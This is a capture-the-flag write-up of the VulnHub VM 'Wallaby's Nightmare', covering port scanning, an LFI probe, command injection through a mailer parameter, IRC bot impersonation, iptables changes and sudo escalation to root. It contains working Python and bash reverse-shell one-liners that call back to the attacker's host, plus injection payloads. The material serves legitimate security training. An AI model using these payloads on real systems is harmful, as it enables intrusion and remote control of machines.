[VULNHUB] Wallaby’s: Nightmare (1.0.2)

This VM is really awesome, especially the privilege escalation part! Let’s hack it!

RCE IS YOUR FRIEND

First of all I discovered the open ports of the VM:

nmap 192.168.1.11 -p 1-65535

And I got this:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 18:59 CET
Nmap scan report for 192.168.1.11
Host is up (0.0081s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
6667/tcp filtered irc

Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds

I browsed to http://192.168.1.11 and I found a submit form which said:

Enter a username to get started with this CTF! 

Cool, I typed ReverseBrain and I pressed the submit button. I got a redirect to a page which suggested me some tips, at the end of the page there were a link to start the VM. I pressed on Start the CTF! and I got redirect to http://192.168.1.11/?page=home. The first thing that I tried was a LFI on page parameter: http://192.168.1.11/?page=../../../../../../etc/passwd and I got:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
walfin:x:1000:1000:walfin,,,:/home/walfin:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
steven?:x:1001:1001::/home/steven?:/bin/bash
ircd:x:1003:1003:,,,:/home/ircd:/bin/bash

Seems that the LFI worked! Looking into the source code of the page I noticed an HTML comment:

This is what we call 'dis-information' in the cyber security world!  Are you learning anything new here ReverseBrain

Grrrr, it was an honeypot… Let’s see if we got /etc/passwd with http://192.168.1.11/?page=../../../../../../etc/shadow but I got this:

That's some fishy stuff you're trying there ReverseBrain buddy. You must think Wallaby codes like a monkey! I better get to securing this SQLi though...

(Wallaby caught you trying an LFI, you gotta be sneakier! Difficulty level has increased.)

Now I tried to navigate around the website but seems the port 80 was close. So I retried an nmap scan:

nmap 192.168.1.11 -p 1-65535

And I discovered that the web server switched to another port:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 19:10 CET
Nmap scan report for 192.168.1.11
Host is up (0.0082s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
6667/tcp  filtered irc
60080/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 3.15 seconds

So I browsed to http://192.168.1.11:60080/ and on the new web page there was an image and a phrase which said:

HOLY MOLY, this guy ReverseBrain wants me...Glad I moved to a different port so I could work more securely!!!

Eheheheh, now I tried to bruteforce the pages. I browsed to http://192.168.1.11:60080/?page=test and I got an error:

Dude, ReverseBrain what are you trying over here?!

Now I reloaded the page intercepting the GET request with BurpSuite, I sent it to Intruder with the following payload:

GET /?page=§test§ HTTP/1.1
Host: 192.168.1.11:60080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

I used raft-small-directories-lowercase.txt as wordlist and I found index, home, mailer and blacklist. I browsed to http://192.168.1.11:60080/?page=mailer and there was only a Coming soon guys! blue header. Into the source code I found a comment which said:

/?page=mailer&mail=mail wallaby "message goes here"

So I tried to verify if the mail parameter was affected by RCE vulnerability. So I tried http://192.168.1.11:60080/?page=mailer&mail=id and I got:

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Cool! Now I can get a reverse shell. First of all I started listen locally:

nc -lvp 1234

Then I typed:

http://192.168.1.11:60080/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now I have a reverse shell and I got a TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I need to escalate privileges.

TAKE CARE ABOUT THE IRC BOTS!

First of all I tried:

sudo -l

This is the output:

Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
    (ALL) NOPASSWD: /sbin/iptables

So I can modify the iptables as root. I took a look on the processes too:

waldo      727  0.0  0.5  29416  2924 ?        Ss   09:55   0:00 tmux new-session -d -s irssi
waldo      729  0.0  0.1   4508   700 pts/0    Ss   09:55   0:00 -sh
waldo      749  0.0  1.7 115744  8520 pts/0    Sl+  09:55   0:00 irssi
wallaby    977  0.0  4.9 516868 24964 ?        Sl   09:55   0:00 /usr/bin/python3 /usr/bin/sopel -d --quiet

Seems that waldo is connected to the IRC server which is not accessible from the external network and seems to be an IRC bot too made with Sopel and started from wallaby. First of all check the iptables:

Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     tcp  --  127.0.0.1            0.0.0.0/0            tcp dpt:6667
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:6667

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination 

As I suspected the iptables DROP the request to IRC port 6667 if they come from 0.0.0.0 but not from localhost. Remove this chain and add a new one:

sudo iptables -D INPUT -p tcp -m tcp --dport 6667 -j DROP
sudo iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6667 -j ACCEPT

Now I can connect to IRC server from HexChat which is already installed into my Kali box. I added a new server called CTF with the following IP/Port: 192.168.1.11/6667. I found the only available channel which was #wallabyschat (from irssi inside the exploited VM). So I joined it:

/join #wallabyschat

There were 3 users: me, waldo (who was the channel operator) and wallabysbot. The bot is made with Sopel which accepts lot of command included .run. I typed it and I got a response from the bot:

Hold on, you aren't Waldo?

I analyzed the command browsing to /home/wallaby/.sopel/modules and I found run.py:

import sopel.module, subprocess, os
from sopel.module import example

@sopel.module.commands('run')
@example('.run ls')
def run(bot, trigger):
     if trigger.owner:
          os.system('%s' % trigger.group(2))
          runas1 = subprocess.Popen('%s' % trigger.group(2), stdout=subprocess.PIPE).communicate()[0]
          runas = str(runas1)
          bot.say(' '.join(runas.split('\\n')))
     else:
          bot.say('Hold on, you aren\'t Waldo?')

Nice! There is a RCE vulnerability but I need to be logged as waldo first. So I edited the iptables:

sudo iptables -D INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT
sudo iptables -A OUTPUT -o enp0s17 -s 127.0.0.1 -p tcp --dport 6667 -m owner --uid-owner waldo -j DROP

After some minutes waldo got a timeout error. After that I changed my nick:

/nick waldo

Now I exploited the RCE vulnerability:

.run id

It worked! I started listen locally:

nc -lvp 1235

Then I sent to the bot this string.

.run python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.14",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now I have another reverse shell as wallaby, I got a TTY and I typed:

sudo -l

This is the output:

Matching Defaults entries for wallaby on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wallaby may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL

I can run all commands with sudo. So I typed:

export TERM=xterm
sudo vi

Then I pressed ESC to enter into command mode, then I pressed ENTER. Now I started listen locally:

nc -lvp 1236

Now from vi I typed:

:!bash -i >& /dev/tcp/192.168.1.14/1236 0>&1

Now I got a shell as root. Browsing into /root I found flag.txt:

###CONGRATULATIONS###

You beat part 1 of 2 in the "Wallaby's Worst Knightmare" series of vms!!!!

This was my first vulnerable machine/CTF ever!  I hope you guys enjoyed playing it as much as I enjoyed making it!

Come to IRC and contact me if you find any errors or interesting ways to root, I'd love to hear about it.

Thanks guys!
-Waldo
Advertisements
[VULNHUB] Wallaby’s: Nightmare (1.0.2)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s